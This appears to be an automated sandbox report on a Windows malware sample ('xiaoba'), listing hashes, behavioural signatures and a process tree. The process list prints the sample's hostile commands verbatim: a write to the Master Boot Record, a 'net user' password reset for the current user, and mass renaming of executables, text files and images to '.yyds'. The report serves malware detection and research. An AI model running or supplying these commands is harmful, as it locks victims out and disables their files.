Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
125s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
08/08/2023, 15:38
Static task
static1
Behavioral task
behavioral1
Sample
980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe
Resource
win10v2004-20230703-en
General
-
Target
980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe
-
Size
716KB
-
MD5
980c6495b5be689bd08ca90360eca8c3
-
SHA1
31bc8d269709b93f3cb3f43494f916fd7c1390e5
-
SHA256
1acdd1c18009ee16bea0c9d64f6b63b1243449531384a4265e1ef9cc66439466
-
SHA512
013b399a86c77012b72419fca54f78a51556f84bba3589a2f6e5ad73746732b2e4570ba0c0209688df173830e85b57d2a0851ac535aa07b68dbf47cfeda1fa2c
-
SSDEEP
12288:BaPVmPWz9Ms99bJ9RQ8gzl8c1osWoZ+v6b+w:Bfuzis9hxolDasWoZxb+w
Malware Config
Signatures
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\physicaldrive0 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe -
Runs net.exe
-
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4840 cmd.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 4612 wrote to memory of 2772 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 82 PID 4612 wrote to memory of 2772 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 82 PID 4612 wrote to memory of 2772 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 82 PID 2772 wrote to memory of 5112 2772 cmd.exe 84 PID 2772 wrote to memory of 5112 2772 cmd.exe 84 PID 2772 wrote to memory of 5112 2772 cmd.exe 84 PID 5112 wrote to memory of 2836 5112 net.exe 85 PID 5112 wrote to memory of 2836 5112 net.exe 85 PID 5112 wrote to memory of 2836 5112 net.exe 85 PID 4612 wrote to memory of 1904 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 86 PID 4612 wrote to memory of 1904 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 86 PID 4612 wrote to memory of 1904 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 86 PID 4612 wrote to memory of 4840 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 88 PID 4612 wrote to memory of 4840 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 88 PID 4612 wrote to memory of 4840 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 88 PID 4612 wrote to memory of 1956 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 90 PID 4612 wrote to memory of 1956 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 90 PID 4612 wrote to memory of 1956 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 90 PID 4612 wrote to memory of 4844 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 92 PID 4612 wrote to memory of 4844 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 92 PID 4612 wrote to memory of 4844 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 92 PID 4612 wrote to memory of 1820 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 95 PID 4612 wrote to memory of 1820 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 95 PID 4612 wrote to memory of 1820 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 95 PID 4612 wrote to memory of 2896 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 97 PID 4612 wrote to memory of 2896 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 97 PID 4612 wrote to memory of 2896 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 97 PID 4612 wrote to memory of 2660 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 99 PID 4612 wrote to memory of 2660 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 99 PID 4612 wrote to memory of 2660 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 99 PID 4612 wrote to memory of 3600 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 101 PID 4612 wrote to memory of 3600 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 101 PID 4612 wrote to memory of 3600 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 101 PID 4612 wrote to memory of 1988 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 103 PID 4612 wrote to memory of 1988 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 103 PID 4612 wrote to memory of 1988 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 103 PID 4612 wrote to memory of 676 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 105 PID 4612 wrote to memory of 676 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 105 PID 4612 wrote to memory of 676 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 105 PID 4612 wrote to memory of 2152 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 107 PID 4612 wrote to memory of 2152 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 107 PID 4612 wrote to memory of 2152 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 107 PID 4612 wrote to memory of 3252 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 109 PID 4612 wrote to memory of 3252 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 109 PID 4612 wrote to memory of 3252 4612 980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe"C:\Users\Admin\AppData\Local\Temp\980c6495b5be689bd08ca90360eca8c3_xiaoba_JC.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\SysWOW64\cmd.execmd /c net user %username% san0109112⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\net.exenet user Admin san0109113⤵
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin san0109114⤵PID:2836
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c cd C:\Users\%username%\Desktop2⤵PID:1904
-
-
C:\Windows\SysWOW64\cmd.execmd /c ren *.exe *.exe.yyds2⤵
- Suspicious behavior: RenamesItself
PID:4840
-
-
C:\Windows\SysWOW64\cmd.execmd /c ren *.com *.com.yyds2⤵PID:1956
-
-
C:\Windows\SysWOW64\cmd.execmd /c ren *.scr *.scr.yyds2⤵PID:4844
-
-
C:\Windows\SysWOW64\cmd.execmd /c ren *.txt *.txt.yyds2⤵PID:1820
-
-
C:\Windows\SysWOW64\cmd.execmd /c ren *.bat *.bat.yyds2⤵PID:2896
-
-
C:\Windows\SysWOW64\cmd.execmd /c ren *.cmd *.cmd.yyds2⤵PID:2660
-
-
C:\Windows\SysWOW64\cmd.execmd /c ren *.lnk *.lnk.yyds2⤵PID:3600
-
-
C:\Windows\SysWOW64\cmd.execmd /c ren *.jpeg *.jpeg.yyds2⤵PID:1988
-
-
C:\Windows\SysWOW64\cmd.execmd /c ren *.jpg *.jpg.yyds2⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.execmd /c ren *.png *.png.yyds2⤵PID:2152
-
-
C:\Windows\SysWOW64\cmd.execmd /c ren *.ico *.ico.yyds2⤵PID:3252
-